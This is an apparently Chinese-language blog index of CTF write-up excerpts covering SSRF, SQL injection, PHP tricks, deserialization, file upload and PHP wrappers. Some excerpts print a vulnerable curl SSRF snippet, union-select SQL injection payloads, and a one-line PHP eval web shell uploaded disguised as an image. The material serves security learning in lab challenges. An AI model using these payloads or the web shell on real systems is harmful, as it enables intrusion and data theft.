ssrf 知识点:SSRF攻击点 123456789<?php$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result=curl_exec($ch);curl_close($ch);?&g 2023-09-26
sql注入 web171常规sql注入payload: 123456-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+-1' union select 1,2,group_concat(column_name) from 2023-09-15
php特性 web89123456789101112include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ 2023-09-14
buuctf_misc 金三胖下载给的zip文件,是个gif动图使用stegsolve打开 File Format: 文件格式,这个主要是查看图片的具体信息,类似与winhex的用法 Data Extract: 数据抽取,图片中隐藏数据的抽取 Frame Browser: 逐帧浏览,主要是对GIF之类的动图进行分解,动图变成一张张图片,便于查看 Image Combiner: 拼图,图片拼接 用Frame b 2023-09-06
web入门_反序列化 web254123456789101112131415161718192021222324252627282930313233343536373839404142error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username=& 2023-08-05
web入门:文件上传 web151首先创建一个记事本,内容为<?php eval($_POST['a']);?>然后修改文件后缀为png,因为题目要求上传一个图片文件,上传时使用burpsuite进行抓包,在burpsuit上修改将后缀名改为php文件上传成功后,会给你你刚才上传的路径在url中输入以进入路径,然后复制网址使用中国蚁剑进入文件查询获取flag web152同上,一模一样 we 2023-05-25
ctf_web web1ctrl+u查看源代码即可找到base64编码形式的flag web2输入万能钥匙使用burp suite抓包在burp suite里右键选择send to repeater使用联合查询来查询回显位置 11' or 1=1 union select 1,2,3# 接着就是爆库 11' or 1=1 union select 1,database(),3# 爆表 11 2023-05-23
litctf_2023 导弹迷踪题目描述已经告诉了答案,只要通过第六关就能拿到flag,也有一种方法,ctrl+u查看源代码拉到最下面,看到了一堆js文件,挨个访问,最后我们再game.js文件发现了很多leval关键词,ctrl+f全局搜索level发现了flag 1zjs打开题目是一个可操作的魔方,它并没有告诉获得flag的方式,而且魔方是没有打乱的,所以好像和魔方并没有什么关系,我们打开源码突然想到作者在题目描述里 2023-05-20
常见PHP语法 Include()Include(‘‘)用于获取指定文件中存在的所有文本,代码和标记,并复制到使用该语句的 文件中,在服务器执行之前,将php文件的内容插入到另一个php文件。 substr()函数语法:Sub(string,start,Length)string: 必须。规定要返回其中一部分的字符串。 start: 必须。规定在字符串的何处开始。 正数 - 在字符串的指定位置开始 负数 2023-05-09
php伪协议🥰 php伪协议是ctf中的一个考点,目前比较熟悉的伪协议有php://filter,php://input,data://text/plain,file://。要成功应用伪协议需要php.ini文件的allow_url_fopen 默认开启 allow_url_include 默认关闭 file:& 2023-04-27